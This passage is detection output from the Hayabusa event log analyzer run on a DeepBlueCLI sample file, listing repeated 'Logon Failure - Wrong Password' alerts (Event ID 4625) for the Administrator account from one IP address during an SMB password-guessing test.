NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xS8U3UQNz6l0LZn0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no6cftQ5MF1fjZ0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5WHS6jVRnCUH0Rb5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i3oGLwrCJXJOauf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1sxPrDYV3rr4pGJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Osysh2O2A3A2bN22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FsInW9EMJZU8FOrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ge8do8TM4GG1atMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w5GLbpVsAhGqCiq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8eQXeW1VpRU0ptMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhLosoA2parzTnW9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MCFTP4gVGEKFKuRI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALrDwJz2cta9fcXB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZZNXGw28osMQLjub : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wQzvMnwYuEQRO7V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UloOAIgGuj6NecfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVSeLo2PRgGmf83Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SaCFO8CPFLuERugV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCwV1D4L5BDZSriK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QPhLQsM4R2ua4SxW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fwgp52JNi7xnTxpN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2GutBDenjweAluz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wflcgg5ebqu8hHGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jXaaYSU2pakw6IsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfJnBv3eA8wZttML : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOXSI0jPfbvW4dAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JW6aX5mNz7cETsl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVuJLXJzlVnDLT4Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtSwhwnApnPI9AkO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1peOkjbd1WXGEAAM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tbw3V9MtLIcxr65R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CEZ2v1f6t0luDj4D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R0omMppAFlFhE1mG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0jMvVN9eSeGW3zcN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnFNYabbO7IpbVku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KtyTTNdqVikZGYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DCChjnFv2hMXXwgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvIYRZSomaJYJOH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEirUFRscaOwTuAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwQgMM9H1oN4te9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JbGILYTcFwtYbDk1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5KzNsgWvyUhNEHd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGvwbOtP3A5eDKCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YZvtNNX511hIleST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJBRTeW6OQtNrt5u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hovgq99STVt2GzrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4kpT3gf0VCAVuVSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiB04AvkYp0PP3n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PPluKgaiT10oC35V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8nCOM9uUeqv9QBx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dSPrrNCh2FSWZKbI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLDnCjr4pSdKAMX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0UnmfB7lcXKEAvn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogjMSxcUw7cF5dMa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75uB8ejsSV5CbagM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5MMHLnyrzBQxluHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QXLn6fpmR52RBAz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcdlrSUzcFNpaK5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJjiRO5rJzZ8XtqP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncBraDdG2htkHjXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lo9DNrL44Z2S2SYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QKcFiKC5QiIoHtxy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sqvq9GwuPCO15lUV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XzgtJ3qUmkFiIY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1wc1Hjb4AK0Np1q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKYNy0JyxIlFusMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IrcKp13ut9M0pCi0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B3lJSH0r8iHAVhPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ju3lCbvbwvkIKsBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQOHcZeAKQG6wHhC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBPkgoKDLABqdSQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqj4xOCsJg1j3IIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhBIu6wUPHc3DZAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0fI1GhH5YTOHbNN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7mLOWiojillZNYH : IP Address: 192.168.198.149 : AuthPackage: 